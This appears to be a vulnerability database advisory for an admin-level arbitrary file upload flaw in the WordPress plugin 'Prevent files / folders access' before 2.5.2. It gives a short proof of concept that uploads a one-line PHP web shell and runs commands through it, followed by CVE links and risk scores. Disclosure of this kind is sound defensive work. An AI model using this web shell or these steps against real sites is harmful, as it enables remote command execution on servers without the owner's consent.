Lucene search
DmitriiWPEX-ID:53816136-4B1A-4B7D-B73B-08A90C2A638FHistoryAug 30, 2023 - 12:00 a.m.
Prevent files / folders access < 2.5.2 - Admin+ Arbitrary File Upload
2023-08-3000:00:00
Dmitrii
32
admin privilege
file upload
php file
security exploit
process list
Description The plugin does not validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server.
1) Create a PHP file `cmd.php` with the contents `<?php system($_GET['cmd']); ?>`
2) Go to https://example.com/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
3) Then upload a file with the PHP extension
4) Follow the link https://example.com/wp-content/uploads/protectedfiles/{filename}.php?cmd=ps+aux
5) You will be able to see a list of processes when the PHP is executedRelated
cve
cve
CVE-2023-4238
2023-09-25 16:15:14
nvd
nvd
CVE-2023-4238
2023-09-25 16:15:14
cvelist
cvelist
prion
prion
Code injection
2023-09-25 16:15:00
wpvulndb
wpvulndb
Prevent files / folders access < 2.5.2 - Admin+ Arbitrary File Upload
2023-08-30 00:00:00
githubexploit
githubexploit
Exploit for CVE-2023-4238
2023-09-11 23:53:11
wordfence
wordfence
7.5 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
19.5%
Related for WPEX-ID:53816136-4B1A-4B7D-B73B-08A90C2A638F